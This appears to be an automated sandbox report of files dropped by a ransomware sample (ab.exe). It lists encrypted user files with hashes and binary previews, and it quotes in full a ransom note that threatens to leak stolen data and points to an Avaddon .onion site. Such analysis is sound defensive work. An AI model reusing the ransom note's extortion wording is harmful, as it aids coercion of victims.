Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Desktop\SQSJKEBWDT.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9825890711738445
Encrypted:	false
SSDEEP:	192:iW6ed4PS9NKrabdCZNMAOOkPhj9Mu06OOkQSFxSZV+n:ifJW+WhRvYIm5
MD5:	CD449FC1F57E31C43ED0892AD55C0911
SHA1:	985E98A4753DC101DD091F3729E4D306D46FDE76
SHA-256:	05230D1AD580B9A1F967DC1293D47B8FE33BC74F7B34A85A2D69DDEFFD7CE0A8
SHA-512:	0B369541278EB8821D9F931D683B51F71488F5F5FAFEDBAF7008ACAFE436A0B02FA2C97AC63D6B0CE65D41905CF832F694D8CC626E905F637A4E2FC6D4B9C418
Malicious:	false
Preview:	.Y..B.YR:......C.y.l..8.a.t.O..bC=...V..3D........:=9..q..........Q..S.].2....F..%..6 uKuu..{n....W.Z........AZ.\|..l.\.=.a.e...............a...3.H.....@g.....D.S.?.0P>..k-.{a...n.B.n....../.x5.hE..f.M...%..T.i...L...J.....?.$..G..e9..Y.....l,].....$...~..4.....b=....aU.`#[.l#e?PI..s@#.Y.....^.:.W #MF.?OQY$.Fj.....7...nm..1...~-+6.ZZ.C.jJ.4...m].o....._...p(5.~Y.BM....J+n9.=h.......v(1o..y..:.[h~..E[.>....r;.v.q.........."B......_.1..10.u8..]......B+R....`_......gfN..2..U+.j ..af ...E.:....:qv.....h.N....Y...2.PTc....o..,....+..o.q..=.X....(.....R.5....1.....-.~.,{s....N../.5...K..A.......&.P............. .r..x... .g...q....+{..f....J......;...{.rF..v...Adp...........h...{.......^.p._.....Ux..-o\Z.....{...g.PM...0.......N.)q....v.BR.v;9....\Wk.Xj.A..m%..uV.5P.....k .5.....G.}..@w.."..(..Qq......@.r....3_.$)y...GY....~x...y.i]..(..}..Z3..F19..z.?kP..Jn.'....)l.F.cQ.....'fz.pm?.;......r......3........a5MUw\|#.K..R.wF...*i....]E....".UH.w.L..

C:\Users\user\Desktop\SQSJKEBWDT.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.9825890711738445
Encrypted:	false
SSDEEP:	192:iW6ed4PS9NKrabdCZNMAOOkPhj9Mu06OOkQSFxSZV+n:ifJW+WhRvYIm5
MD5:	CD449FC1F57E31C43ED0892AD55C0911
SHA1:	985E98A4753DC101DD091F3729E4D306D46FDE76
SHA-256:	05230D1AD580B9A1F967DC1293D47B8FE33BC74F7B34A85A2D69DDEFFD7CE0A8
SHA-512:	0B369541278EB8821D9F931D683B51F71488F5F5FAFEDBAF7008ACAFE436A0B02FA2C97AC63D6B0CE65D41905CF832F694D8CC626E905F637A4E2FC6D4B9C418
Malicious:	false
Preview:	.Y..B.YR:......C.y.l..8.a.t.O..bC=...V..3D........:=9..q..........Q..S.].2....F..%..6 uKuu..{n....W.Z........AZ.\|..l.\.=.a.e...............a...3.H.....@g.....D.S.?.0P>..k-.{a...n.B.n....../.x5.hE..f.M...%..T.i...L...J.....?.$..G..e9..Y.....l,].....$...~..4.....b=....aU.`#[.l#e?PI..s@#.Y.....^.:.W #MF.?OQY$.Fj.....7...nm..1...~-+6.ZZ.C.jJ.4...m].o....._...p(5.~Y.BM....J+n9.=h.......v(1o..y..:.[h~..E[.>....r;.v.q.........."B......_.1..10.u8..]......B+R....`_......gfN..2..U+.j ..af ...E.:....:qv.....h.N....Y...2.PTc....o..,....+..o.q..=.X....(.....R.5....1.....-.~.,{s....N../.5...K..A.......&.P............. .r..x... .g...q....+{..f....J......;...{.rF..v...Adp...........h...{.......^.p._.....Ux..-o\Z.....{...g.PM...0.......N.)q....v.BR.v;9....\Wk.Xj.A..m%..uV.5P.....k .5.....G.}..@w.."..(..Qq......@.r....3_.$)y...GY....~x...y.i]..(..}..Z3..F19..z.?kP..Jn.'....)l.F.cQ.....'fz.pm?.;......r......3........a5MUw\|#.K..R.wF...*i....]E....".UH.w.L..

C:\Users\user\Desktop\SUAVTZKNFL.pdf Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97801784462802
Encrypted:	false
SSDEEP:	192:+dD0nCHz20HKCr6p47DtMp7bsz5EYRUO0VMQyPcXEecX3H1fLV+n:PATvrXtMp7i5EImVMNcOHHxs
MD5:	35A1C1E18B19CD1D7D9EAE2236F1F48F
SHA1:	833E616EBE2F358A2B62669A52AC714682DD989F
SHA-256:	6CF67F88332E3F09E0C433E074790524D30A0BCDEFD6DDC99B0E1B0ACE618290
SHA-512:	188C5F4E5749AC34CB3EC451DA88090EF697B38E358CEA1B38DAE58F11E1429C269A68A64AD63E5B7079B9FFB14649BF698AEDF56B2635B51864D1DF6430CFF1
Malicious:	false
Preview:	.f..N.bO).o~P~P.C.2k..@..Z...YZ.f....4g.n.`.Y).....\..+J.".%..["...$..{1..C....(.G.U.wU.8Qd....h.O...O..).DL.Nd:.Y..A...$~.K.u.1.hG.S1i...\|..........;.."...&3uI...t.D4..{n..Ia%.......].#.,a_...........2.....+........k...[W..mi)/}.G..ko......X.I.N..d....\..T.,g.A/.YeB......M.0.].4..r..s..r..[..x.Kv...".......@.}"..z.....>.g}.....!.......D.;......q..U....D....&..kr...FdV.dW.6u.#.....3{...(.Qt.E.d.X.............(....#E1...?N!...M.-..o..7...K...Z........>u.?..<.e..$I...B........;]..q.....#.Nf......[.1..F.\|...K.&&\....V..v....4..M.{...v.r...4...@.a..y&.._\|;\D...A..#...\|_].....(/.Ez..S......9...b..6.&oN..}..w...W3.....x..];@........s._.i.b..^.D...-....].c.N. .k.Q..5..Hka?.....dV.......f..0....{.z...Ak.q..._.mc....%.:y..B...)\|gN^$.}I.K....-.:....tR%......_4...T...D>RY.R..:Ckr...<...s..;\.......)fL..gWjf......6l.fB.J..e>.~...P....?XB4.X....st..(.......~......3..D..'....L..e.^...C........(.?.^......"Xylz6.7.9..LZw..Q$....\|.DW.^.P.~...i.....

C:\Users\user\Desktop\SUAVTZKNFL.pdf.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.97801784462802
Encrypted:	false
SSDEEP:	192:+dD0nCHz20HKCr6p47DtMp7bsz5EYRUO0VMQyPcXEecX3H1fLV+n:PATvrXtMp7i5EImVMNcOHHxs
MD5:	35A1C1E18B19CD1D7D9EAE2236F1F48F
SHA1:	833E616EBE2F358A2B62669A52AC714682DD989F
SHA-256:	6CF67F88332E3F09E0C433E074790524D30A0BCDEFD6DDC99B0E1B0ACE618290
SHA-512:	188C5F4E5749AC34CB3EC451DA88090EF697B38E358CEA1B38DAE58F11E1429C269A68A64AD63E5B7079B9FFB14649BF698AEDF56B2635B51864D1DF6430CFF1
Malicious:	false
Preview:	.f..N.bO).o~P~P.C.2k..@..Z...YZ.f....4g.n.`.Y).....\..+J.".%..["...$..{1..C....(.G.U.wU.8Qd....h.O...O..).DL.Nd:.Y..A...$~.K.u.1.hG.S1i...\|..........;.."...&3uI...t.D4..{n..Ia%.......].#.,a_...........2.....+........k...[W..mi)/}.G..ko......X.I.N..d....\..T.,g.A/.YeB......M.0.].4..r..s..r..[..x.Kv...".......@.}"..z.....>.g}.....!.......D.;......q..U....D....&..kr...FdV.dW.6u.#.....3{...(.Qt.E.d.X.............(....#E1...?N!...M.-..o..7...K...Z........>u.?..<.e..$I...B........;]..q.....#.Nf......[.1..F.\|...K.&&\....V..v....4..M.{...v.r...4...@.a..y&.._\|;\D...A..#...\|_].....(/.Ez..S......9...b..6.&oN..}..w...W3.....x..];@........s._.i.b..^.D...-....].c.N. .k.Q..5..Hka?.....dV.......f..0....{.z...Ak.q..._.mc....%.:y..B...)\|gN^$.}I.K....-.:....tR%......_4...T...D>RY.R..:Ckr...<...s..;\.......)fL..gWjf......6l.fB.J..e>.~...P....?XB4.X....st..(.......~......3..D..'....L..e.^...C........(.?.^......"Xylz6.7.9..LZw..Q$....\|.DW.^.P.~...i.....

C:\Users\user\Desktop\SUAVTZKNFL.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982133728343291
Encrypted:	false
SSDEEP:	192:G9BGLtnEEOP+kPvHm8oblTnHyIP7IihQs+J785q1oxcxV+n:GqLtEDPNm8YlTnSIP7Iij+J785q1oxcu
MD5:	71503B8FAD2224BBBA0DD18F73FE3A63
SHA1:	1816FC21433626A53C83D580BF74459850AB5092
SHA-256:	8D9DDA40D0DD943B7A9955D2F002C9E40DCBDAC08184559C6F62A67EFAAD839A
SHA-512:	580C5FE18D1F20D2966239876B08736D11563E8A17456B3A3E81C47B2EE83E0E4EE3CE76AF41462DBDB5C6D946E78FBEB187A50C407429689CD4F38593D720C7
Malicious:	false
Preview:	N5.;..7...b..k......QB.F.....q...L/_6...q..H%).M..uxa.S/........5.Q...&..r:..#."@..F.NYj.......R...$...4)\|.,f..].bH.....1@.C.0_.Q?t.a...e...B.Y...X..:.....+R.n..?...,"..xR.%6.H.~\........e.....w.lg...AW.0...lNP..d.jA.3.h..4m..:....$.4...@g...l7...f77.J....../....y.` .u.@.^....o..Z}M%..-(.G.....^..F.....G.`.P....D.@b......a... h7....g.m...GXA.u....:.KP..v<.z.P.;.....S..['t`.Q..~U..g.dX^M].Y$i.$.Z.6....[...W.#.[.s.Xt...L.6..DQ.K.;x..6.W1.....d+u n.a..Q,......S..\.tT......R,=..)..~.BE.Dl..P..V.. ]....&p.HH.......J....qO..&U..Ob@n.g......j.K.B'%...>..kY..'A4YA..j..>u.^...yOr.U...#X....Q.4..s...j.ct0.r......W.H2o.-.....?..E;....p....9...%[X.Kd$T.O<......0..&.'./.._.".._...,D..z+.;....\r..k,Rs1..[A.0.k.P4...d....X._..7..+...L./qt....J"J...._MIi...... 11d..".$.0......iQ5-......_...{l=,6o...B..Py.0.8.......G..h$~.V.M.T.h..X)k...!qrhE......5.b......Y.9.....L.(.g.\|(..}.W...MdY..\|.......3M..&..D....&..R....G.......xu=.....u`/[+R......E.?

C:\Users\user\Desktop\SUAVTZKNFL.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.982133728343291
Encrypted:	false
SSDEEP:	192:G9BGLtnEEOP+kPvHm8oblTnHyIP7IihQs+J785q1oxcxV+n:GqLtEDPNm8YlTnSIP7Iij+J785q1oxcu
MD5:	71503B8FAD2224BBBA0DD18F73FE3A63
SHA1:	1816FC21433626A53C83D580BF74459850AB5092
SHA-256:	8D9DDA40D0DD943B7A9955D2F002C9E40DCBDAC08184559C6F62A67EFAAD839A
SHA-512:	580C5FE18D1F20D2966239876B08736D11563E8A17456B3A3E81C47B2EE83E0E4EE3CE76AF41462DBDB5C6D946E78FBEB187A50C407429689CD4F38593D720C7
Malicious:	false
Preview:	N5.;..7...b..k......QB.F.....q...L/_6...q..H%).M..uxa.S/........5.Q...&..r:..#."@..F.NYj.......R...$...4)\|.,f..].bH.....1@.C.0_.Q?t.a...e...B.Y...X..:.....+R.n..?...,"..xR.%6.H.~\........e.....w.lg...AW.0...lNP..d.jA.3.h..4m..:....$.4...@g...l7...f77.J....../....y.` .u.@.^....o..Z}M%..-(.G.....^..F.....G.`.P....D.@b......a... h7....g.m...GXA.u....:.KP..v<.z.P.;.....S..['t`.Q..~U..g.dX^M].Y$i.$.Z.6....[...W.#.[.s.Xt...L.6..DQ.K.;x..6.W1.....d+u n.a..Q,......S..\.tT......R,=..)..~.BE.Dl..P..V.. ]....&p.HH.......J....qO..&U..Ob@n.g......j.K.B'%...>..kY..'A4YA..j..>u.^...yOr.U...#X....Q.4..s...j.ct0.r......W.H2o.-.....?..E;....p....9...%[X.Kd$T.O<......0..&.'./.._.".._...,D..z+.;....\r..k,Rs1..[A.0.k.P4...d....X._..7..+...L./qt....J"J...._MIi...... 11d..".$.0......iQ5-......_...{l=,6o...B..Py.0.8.......G..h$~.V.M.T.h..X)k...!qrhE......5.b......Y.9.....L.(.g.\|(..}.W...MdY..\|.......3M..&..D....&..R....G.......xu=.....u`/[+R......E.?

C:\Users\user\Desktop\ZGGKNSUKOP.mp3 Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976858563339414
Encrypted:	false
SSDEEP:	96:lwi7xlVo04wsZ4uMOQ1OzifjR8mLn4lyQ9IEo9TpL/hN5C9b1Fo64WrX6TgamOLg:nwflzi5dxRYRVGZwiJlOS2nyV+n
MD5:	75B41A9884E670E3122B502625945C4F
SHA1:	718309E610BF5A9C9D0FD1A9DA9411527126891B
SHA-256:	8FA89C2D72133BDC3965578D6380A1DE9ECCCEAC7992C9AF4132E994CA7B4BBD
SHA-512:	DAD40B43C22F1A0BBE80CE78BBB9793B58C0988BB208EFC24FCA42B065193E578EF9095F1815C99C1DAF6709D22E41BC1AFF3184D837030CD5DCD2277BFC17FB
Malicious:	false
Preview:	q.=.e.'\.4.W......:3.J...5.......X.5.^...N.6}W.l!..'.%...U......~hL.X.asl2.......y..}..4....o......NUP..\.. ...{}.:..&ton.k....?....b..k..;.%%.>IP.{9j....._..m..L.....I...........ZN.v.>2...Q.jz..&_.Iep.........Y........t.Zy9:..c..t.J......x5...g.....V.mi..P.I.....p........)..N...vs......t......ql.....en.k..HCU..j.D:..V.#.f.g..W.)I...$.....X.....C.;....X..Y.......w8.X;..+...........^.]aNH@...M-nu/..m..........48F.......24.....1./s..C-.;.V.(<.uC........m.;.i....Rhx..t.[.#../8....u}4R.R.f....-..3.P..n...,(.r..k@..9c...4......y.C.....%.sm<...q..C#...OI._N....P...~$.U%.W8.k.~(...?...j..[?`..`..s.g..$)x.B..e.{....zF3..x...F\|.L..:..=.CUX]h.."~..h6.....)lu"....7^.2.$X..}...!.............1...h..q.p..-.1..Y....]..........0N..p..Wm..c....k.l\@.q%+u...k....w>..9...WX.....tx..P.p...!z.pQ8O..G.=....Z..-.v..b.-...a...g..yd.........Q{..r..2..@..G..].!..DK.i+vC.....C.]....<..B/.....b6}..0g.\...=.j..tD./...-.v..dE#..vM...8..._:V..It.$X....)..s..H.

C:\Users\user\Desktop\ZGGKNSUKOP.mp3.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.976858563339414
Encrypted:	false
SSDEEP:	96:lwi7xlVo04wsZ4uMOQ1OzifjR8mLn4lyQ9IEo9TpL/hN5C9b1Fo64WrX6TgamOLg:nwflzi5dxRYRVGZwiJlOS2nyV+n
MD5:	75B41A9884E670E3122B502625945C4F
SHA1:	718309E610BF5A9C9D0FD1A9DA9411527126891B
SHA-256:	8FA89C2D72133BDC3965578D6380A1DE9ECCCEAC7992C9AF4132E994CA7B4BBD
SHA-512:	DAD40B43C22F1A0BBE80CE78BBB9793B58C0988BB208EFC24FCA42B065193E578EF9095F1815C99C1DAF6709D22E41BC1AFF3184D837030CD5DCD2277BFC17FB
Malicious:	false
Preview:	q.=.e.'\.4.W......:3.J...5.......X.5.^...N.6}W.l!..'.%...U......~hL.X.asl2.......y..}..4....o......NUP..\.. ...{}.:..&ton.k....?....b..k..;.%%.>IP.{9j....._..m..L.....I...........ZN.v.>2...Q.jz..&_.Iep.........Y........t.Zy9:..c..t.J......x5...g.....V.mi..P.I.....p........)..N...vs......t......ql.....en.k..HCU..j.D:..V.#.f.g..W.)I...$.....X.....C.;....X..Y.......w8.X;..+...........^.]aNH@...M-nu/..m..........48F.......24.....1./s..C-.;.V.(<.uC........m.;.i....Rhx..t.[.#../8....u}4R.R.f....-..3.P..n...,(.r..k@..9c...4......y.C.....%.sm<...q..C#...OI._N....P...~$.U%.W8.k.~(...?...j..[?`..`..s.g..$)x.B..e.{....zF3..x...F\|.L..:..=.CUX]h.."~..h6.....)lu"....7^.2.$X..}...!.............1...h..q.p..-.1..Y....]..........0N..p..Wm..c....k.l\@.q%+u...k....w>..9...WX.....tx..P.p...!z.pQ8O..G.=....Z..-.v..b.-...a...g..yd.........Q{..r..2..@..G..].!..DK.i+vC.....C.]....<..B/.....b6}..0g.\...=.j..tD./...-.v..dE#..vM...8..._:V..It.$X....)..s..H.

C:\Users\user\Desktop\ZQIXMVQGAH.xlsx Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977778621685226
Encrypted:	false
SSDEEP:	192:mTbglMUIvyEz2rX/2yQ/SpGfaK6bs08rlO0H6YuPHH4C09RV+n:mvglMUg2HQ/S6aK+E4fNPHd09O
MD5:	23CF59EA3AFE792F21FE4A8C00125E34
SHA1:	EB403738820421CFA040CA4B1404032788569393
SHA-256:	6C47D734DA1F9817030D14E744D7EBA1C7EC793A86E8713CBCCAB00B907E43B8
SHA-512:	4C01EB5F094A5D9621182D28958F14E1C0E51D5938D9804B2B38D8CE5B8DC3206FBE4F75B504B76B79DC970F0C1AB3FB31BC92286C294D06818C7BDDA4F69080
Malicious:	false
Preview:	OqG..k..4Z.5T....H....vA...o.WU...'hE`.P.@.b.S{n..;4...e..S7{........C.R...0..i.1.pl...a1..h9.i......w\.....F...R??..Z.u4....B..P.@..z....)a..o.6YC..86..ApW.Bt....3..}......6..q..4..YY..C.I.-..t.D.GP...1o<'....X{.....=...9....t=TCy...x.m..NF..,..}z....6.%s.....y><x.y..~C0.......].g.N.3.c...G..?Im..D.Z....._..B.x..h...N?......I]...^.G..5..z.'E.v........\U.U6b4O..1...B~q...e$.,d....2..x..#d..w..@!g..zG..O.5...u.E..Sv.c..^b...k<..B.{.'k.z.;...$.v.6w.o\a.gw.V.5F.~._....0...^.uJ,C.U...@.....y...7.&3L..3.j........>.....$...$i~.aM).a>9.B..u.(..B.z...<.%.... hw.G+e..y..8$.....%D....l..2.Ht.{%-....<Xj-d...0)/K...a....(..9!....-...!.!..ij.7/....+."....].^...h{p..[.BWM.N..6...$*YU...P.j..:...P.7.aD.,I?G...\|.P.lO6T7&.].....7.P.J...N9@...u.I..KS....S..B.E.&..!.Sq....g.I.. \t..fh..y...... v.gf.D....\..@~..JAM.[. .../<. ...i.+..R.`l....c..]...xS.....k..\.Z.....J`..&..(..Z....8\|-.u.&.\|."..1..mt..j...1h^.@X.6.p....$+...8^. 7..^!....L..1.........o.\|...q.L.#

C:\Users\user\Desktop\ZQIXMVQGAH.xlsx.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.977778621685226
Encrypted:	false
SSDEEP:	192:mTbglMUIvyEz2rX/2yQ/SpGfaK6bs08rlO0H6YuPHH4C09RV+n:mvglMUg2HQ/S6aK+E4fNPHd09O
MD5:	23CF59EA3AFE792F21FE4A8C00125E34
SHA1:	EB403738820421CFA040CA4B1404032788569393
SHA-256:	6C47D734DA1F9817030D14E744D7EBA1C7EC793A86E8713CBCCAB00B907E43B8
SHA-512:	4C01EB5F094A5D9621182D28958F14E1C0E51D5938D9804B2B38D8CE5B8DC3206FBE4F75B504B76B79DC970F0C1AB3FB31BC92286C294D06818C7BDDA4F69080
Malicious:	false
Preview:	OqG..k..4Z.5T....H....vA...o.WU...'hE`.P.@.b.S{n..;4...e..S7{........C.R...0..i.1.pl...a1..h9.i......w\.....F...R??..Z.u4....B..P.@..z....)a..o.6YC..86..ApW.Bt....3..}......6..q..4..YY..C.I.-..t.D.GP...1o<'....X{.....=...9....t=TCy...x.m..NF..,..}z....6.%s.....y><x.y..~C0.......].g.N.3.c...G..?Im..D.Z....._..B.x..h...N?......I]...^.G..5..z.'E.v........\U.U6b4O..1...B~q...e$.,d....2..x..#d..w..@!g..zG..O.5...u.E..Sv.c..^b...k<..B.{.'k.z.;...$.v.6w.o\a.gw.V.5F.~._....0...^.uJ,C.U...@.....y...7.&3L..3.j........>.....$...$i~.aM).a>9.B..u.(..B.z...<.%.... hw.G+e..y..8$.....%D....l..2.Ht.{%-....<Xj-d...0)/K...a....(..9!....-...!.!..ij.7/....+."....].^...h{p..[.BWM.N..6...$*YU...P.j..:...P.7.aD.,I?G...\|.P.lO6T7&.].....7.P.J...N9@...u.I..KS....S..B.E.&..!.Sq....g.I.. \t..fh..y...... v.gf.D....\..@~..JAM.[. .../<. ...i.+..R.`l....c..]...xS.....k..\.Z.....J`..&..(..Z....8\|-.u.&.\|."..1..mt..j...1h^.@X.6.p....$+...8^. 7..^!....L..1.........o.\|...q.L.#

C:\Users\user\Desktop\uCLrcwQ_readme_.txt Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	ASCII text, with very long lines, with CRLF, CR, LF line terminators
Category:	dropped
Size (bytes):	3759
Entropy (8bit):	5.730136376079227
Encrypted:	false
SSDEEP:	48:L9k0ZzV7L/vNbXGZULVDgUp4qNiiE6bm1c0rfWejhAe/YAliM3PXnLHrYxgkH69x:L95zhLNbXGZUe7Ka6pU6i9fLrvE69USV
MD5:	BC4005FCEBB2809AD1A3FC9BFC770F3A
SHA1:	A8E345EDAAD48C68C4D51500F353A3593BAABC08
SHA-256:	A1CC398783672B546E12D4A5EB5642A7E489A5BBF706456F6E31AF4D23AD6A3B
SHA-512:	5D18730BA64987F6A10704D3360F3AE9BEB55F86F9AFBCA5372440CB53799C3D6A108A6802C943380EB42DEB53FE19332DE75711593284520FEF55198665D76E
Malicious:	false
Preview:	-------=== Your network has been infected! ===-------.........*************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************.........All your documents, photos, databases and other important files have been encrypted and have the extension: .bCcBDeabea......You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files!......The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files!......We have also downloaded a lot of private data from your network....If you do not contact as in a 3 days we will post information about your breach on our public news website (avaddongun7rngel.onion) and after 7 days the whole downloaded info.......You can get more information on our page, which is located in a Tor hidden network..........How to get to our page...----------------------------------------------------------------------------

C:\Users\user\Documents\BNAGMGSPLO.jpg Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975973249865253
Encrypted:	false
SSDEEP:	192:hmfcT2lws1S5xJwkDAwzOCzkLPbs0xY3Pw6tVbqnPoV+n:KcThs1IwkDAXCzkLwLVbqPx
MD5:	2DF9548BCB84A6887C5F3547B716F2D1
SHA1:	1CA0D7F6A5C83DFB6F70703EFC1CEE73A5D865D0
SHA-256:	FE582B581489E32FAD98813E86B8A2F2C1D0687E28020F80351CC30EA272D3F6
SHA-512:	7CD1131ED325F2595A05B0FC08F5803E26B7162A96F2A5F22FED893691D312361B230E3D736D5C1B2946D3E250642554BB1857427D122C0A408D7A1FE105DAEE
Malicious:	false
Preview:	apz.)..w....@.........T.C.E...?...H.....l..~Qk.x.Y]:.z8.\...k.e...c{y.A..d.y......(L]O.....5.........R.a.&..>1.......uj..O'.....w...j..T....g..y..Q...zX....$.{'...k\....a,U.....,"O."?P......F7...#."6..3/h..k...G..C...p`.....t@1>G.#.Z[.....u.:.2:.0c.F.p...&t..R.P.......:..n.7......^!!i+LGo....v...b.y$H9.D];=.K......B>.x..~..q.....m...`.].,..\(...._0?.8...=Z2....:...JBc.A.C..y.p...Q4.p...?..+..F.T.8..i..{D...,......X...........?.0r....T9:.......'..dcW..e...@e...d.ve"Fe.8._.....as....<Y#'mT.V{..".D"%.U.=.]..t.F....k..x..."-.?T.0!J5O..s..]RTXA$...C.n.v..Y.....Y.b.e...(Ou.84.o..@.+h.~......E4...=.....7....R.E..Q+....B....?...\|?cY...K..b.eQJ..d.W.,.xzL...l....tk.....&_...B..}...........Q.\F.p\|q.c.}.:.......@....v!]..X[E..3..G..w....."&}.7.y.5.1..;....Z....{..f.W.i.6%.....(\|..I./.B>..*}-u.....Y......y...=....B..;x..ul..w.jB.z..f.Z.b^...N.,.M.....m.....V.5).'v.....kd........Z.{F..m.i...F?...=.6M....g.zS:...2....t.j..$.F..'7x..q..

C:\Users\user\Documents\BNAGMGSPLO.jpg.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.975973249865253
Encrypted:	false
SSDEEP:	192:hmfcT2lws1S5xJwkDAwzOCzkLPbs0xY3Pw6tVbqnPoV+n:KcThs1IwkDAXCzkLwLVbqPx
MD5:	2DF9548BCB84A6887C5F3547B716F2D1
SHA1:	1CA0D7F6A5C83DFB6F70703EFC1CEE73A5D865D0
SHA-256:	FE582B581489E32FAD98813E86B8A2F2C1D0687E28020F80351CC30EA272D3F6
SHA-512:	7CD1131ED325F2595A05B0FC08F5803E26B7162A96F2A5F22FED893691D312361B230E3D736D5C1B2946D3E250642554BB1857427D122C0A408D7A1FE105DAEE
Malicious:	false
Preview:	apz.)..w....@.........T.C.E...?...H.....l..~Qk.x.Y]:.z8.\...k.e...c{y.A..d.y......(L]O.....5.........R.a.&..>1.......uj..O'.....w...j..T....g..y..Q...zX....$.{'...k\....a,U.....,"O."?P......F7...#."6..3/h..k...G..C...p`.....t@1>G.#.Z[.....u.:.2:.0c.F.p...&t..R.P.......:..n.7......^!!i+LGo....v...b.y$H9.D];=.K......B>.x..~..q.....m...`.].,..\(...._0?.8...=Z2....:...JBc.A.C..y.p...Q4.p...?..+..F.T.8..i..{D...,......X...........?.0r....T9:.......'..dcW..e...@e...d.ve"Fe.8._.....as....<Y#'mT.V{..".D"%.U.=.]..t.F....k..x..."-.?T.0!J5O..s..]RTXA$...C.n.v..Y.....Y.b.e...(Ou.84.o..@.+h.~......E4...=.....7....R.E..Q+....B....?...\|?cY...K..b.eQJ..d.W.,.xzL...l....tk.....&_...B..}...........Q.\F.p\|q.c.}.:.......@....v!]..X[E..3..G..w....."&}.7.y.5.1..;....Z....{..f.W.i.6%.....(\|..I./.B>..*}-u.....Y......y...=....B..;x..ul..w.jB.z..f.Z.b^...N.,.M.....m.....V.5).'v.....kd........Z.{F..m.i...F?...=.6M....g.zS:...2....t.j..$.F..'7x..q..

C:\Users\user\Documents\EEGWXUHVUG.png Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979119574837885
Encrypted:	false
SSDEEP:	192:DmVS9drONMnN1jMaHlRdAHmS/9XDnhkLBiGabHCBYV+n:F6aN1waHlRE/9XDnQBi3iBB
MD5:	432F844E78E55603BCF423CED2F41FD3
SHA1:	3B2BC3C7419EB461FAAEDC085D0E6141AE9D9D65
SHA-256:	7FB2181204E0DF582D73A87710DC820244FC811CFBEFABF4E3F2A238A889A932
SHA-512:	5EA8FE8D4A9DB997BAD9DC9F53FACABC693FC781D3B167E6E47651AC072CB7C708B2CD9B83C729DC48030D9A1A325652D07ED938D4ACC83860EE629DDD819F94
Malicious:	false
Preview:	%UYG.!....az.}o..m6...o }...DY..&............'.4...q.BZPn-(.E%@..4..WR.rR..L...V..5..../g..:....Dh!j1..r'.....D..........^....e55...s.b;!......a.....$.\|.....,L...Gu.@JB.j2~...+.6...... .abt..E...D..n.#...........RAC...8Oi.%M(....f..P..)...Yn.\.R9.~.Gj..v......]...Ed+{.^...j.Y......~ ....=...n..}I.G.kGS........}.W._.0U\|.1.a...W..f.gU..9.#.n.ZC..w.R'....F1..u....~K.q#.D:..G(...c;.),#x........[.ip.......S....C..9....j.0\'........b.N.j..G....0.....h...D...H..d^....A.b.=.<v.{1..U.O3..Pj{u.........Hw.W.`.....Fk.!.7..7.....a.f)b..r...q+Av...c.nJ.M9..n.mF..y.....a..F......9J......\P..Dh X4..}.o..`...,3.K<5jZ..#......... .....q.x..........Q....J...1.dUxj.5Y.(.QYK...U.....S.....{./...]....P!~......?[.U...&7..W...d..V3.&Yo..4./B.v.0..C.=..v.PpF...k....n..=....n~.....Ui......C5./\...Ga.....12.e.........W....Vj.-.Dt. .U]..hI..(.8.D...?ThaJ............s2k.m!zs*z[..>~...,]...2..F.ayr...hG. a\|4..4k...=K...o...(Ujtm=....3$.%.....Uq.+e[..=.Q.j$.7..1..

C:\Users\user\Documents\EEGWXUHVUG.png.bCcBDeabea (copy) Download File
Process:	C:\Users\user\Desktop\ab.exe
File Type:	data
Category:	dropped
Size (bytes):	8728
Entropy (8bit):	7.979119574837885
Encrypted:	false
SSDEEP:	192:DmVS9drONMnN1jMaHlRdAHmS/9XDnhkLBiGabHCBYV+n:F6aN1waHlRE/9XDnQBi3iBB
MD5:	432F844E78E55603BCF423CED2F41FD3
SHA1:	3B2BC3C7419EB461FAAEDC085D0E6141AE9D9D65
SHA-256:	7FB2181204E0DF582D73A87710DC820244FC811CFBEFABF4E3F2A238A889A932
SHA-512:	5EA8FE8D4A9DB997BAD9DC9F53FACABC693FC781D3B167E6E47651AC072CB7C708B2CD9B83C729DC48030D9A1A325652D07ED938D4ACC83860EE629DDD819F94
Malicious:	false
